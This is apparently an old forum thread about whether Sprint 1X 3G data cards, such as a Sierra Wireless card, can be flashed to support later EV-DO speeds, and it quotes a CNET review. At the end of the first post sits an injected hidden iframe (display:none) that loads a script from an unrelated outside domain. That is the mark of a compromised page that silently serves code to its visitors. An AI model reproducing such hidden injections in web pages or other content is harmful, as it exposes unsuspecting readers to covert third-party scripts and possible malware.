Upward compatibility of 3G devices

I suspect this is a question for Homer. Does anyone out there have any idea if the 1X 3G devices will be upwardly compatible to handle 2X and 3X as Sprint rolls out higher speeds over the next few years?

I am probably less concerned about support for phone handsets, because as we all know, it is cool to get a new gadget every once in a while, and the NEED to have a fast speed phone for data access is the perfect excuse to HAVE TO upgrade to a new phone.

But, I would like to purchase Sierra Wireless' new CDMA 1X product when Sprint rolls out 3G. If you go to Sierra's website, they have a new product listed there (I think it is the AC540 or 550) that they say will be 1X 3G and supported by Sprint. While I will probably buy one anyway and forego a new phone until something come out that i REALLY want (ie the Kyo 7135), it would be nice to know the card can be "flashed" in the future to support higher speeds. Anyone have any ideas?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

I do not believe they are going to be able to take advantage of the newer EV-DO networks once those are rolled out.

From this CNET review:

http://electronics.cnet.com/electron...22-8-9805602-1

"Later this year, a smattering of 1xRTT-capable phone/PDA hybrids, including the Audiovox Thera Pocket PC, will hit the market, which means I won't have to deal with bulky iPaq PC card sleeves to get my 1xRTT fix. But the real Holy Grail is at least another year away, and probably two, when Verizon and Sprint launch their 1x EV-DO networks. With broadbandlike speeds (1-1.5Mbps), this is bona fide 3G, no doubt about it. And with Verizon currently running 1x EV-DO trials in Washington, D.C., it's not as far from reality as one might think.

If and when 1x EV-DO comes to fruition, I'll gladly ante up the extra $30 a month to make Verizon my high-speed wireless ISP. Make it an all-you-can-eat plan, and I'll even plunk down $50, which is about what my DSL costs. (Sorry, you'll need a 1x EV-DO-capable phone or modem to take advantage of the higher data rates; 1xRTT phones won't do.)"

This is a pretty vague area right now. Rumors are being spread around that Sprint may skip a few steps with 3G and go straight to the final 2.5 Mb. But I repeat that this is just rumor right now.

Marty, you are pretty much correct thought. Unless one of the modem card vendors creates a card that can be flashed and has a chipset that can allow for multiple 1X- evolutions, you will have to buy new cards at each step to take advantage of the faster speed. I am pretty sure that this will not happen. Qualcomm is not likely to release any CDMA-2000 chipset until the very last minute. The longer they can hold people back, the longer they can make money on the older technology.
